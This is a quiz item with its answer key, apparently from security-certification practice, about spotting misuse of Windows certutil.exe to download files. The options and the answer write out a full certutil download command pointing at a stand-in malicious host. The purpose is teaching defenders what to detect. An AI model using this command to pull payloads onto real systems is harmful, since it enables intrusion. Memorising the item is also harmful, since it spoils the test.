A security analyst is investigating a potential compromise on a Windows server where an attacker is suspected of using a 'living off the land' (LotL) technique. Specifically, the attacker is believed to have used `certutil.exe` to download a malicious payload. Which command-line argument, when used with `certutil.exe`, is indicative of its misuse for file download purposes?
- A`certutil -dump`
- B`certutil -viewstore My`
- C`certutil -hashfile C:\malware.exe MD5`
- D`certutil -urlcache -f -split -repcache http://malicious.com/payload.exe C:\payload.exe`
Show answer & explanationAnswer & explanation
Correct answer: D. `certutil -urlcache -f -split -repcache http://malicious.com/payload.exe C:\payload.exe`
The `certutil -urlcache -f -split -repcache` command is a well-known method used by attackers to leverage the legitimate `certutil.exe` utility for downloading files from a specified URL. This sequence of arguments instructs `certutil` to retrieve a file from a URL, force overwrite, split if necessary, and refresh the cache, effectively functioning as a download tool.
Why the other options are wrong
- A. `certutil -dump` is used to dump certificate information, a legitimate function, not for downloading.
- B. `certutil -viewstore` is used to view certificate stores, a legitimate function, not for downloading.
- C. `certutil -hashfile` is used to calculate file hashes, a legitimate function, not for downloading.
Certutil.exe Misuse
The malicious use of the legitimate Windows `certutil.exe` utility, typically for downloading files from the internet or encoding/decoding data, as a 'living off the land' technique.
- Bypasses traditional security controls.
- Used for file download, base64 encoding/decoding.
- Relies on specific command-line arguments.
Memory trick: Attackers use Windows' own 'utilities' like 'Certutil', 'PowerShell', or 'WMIC' to do their dirty work.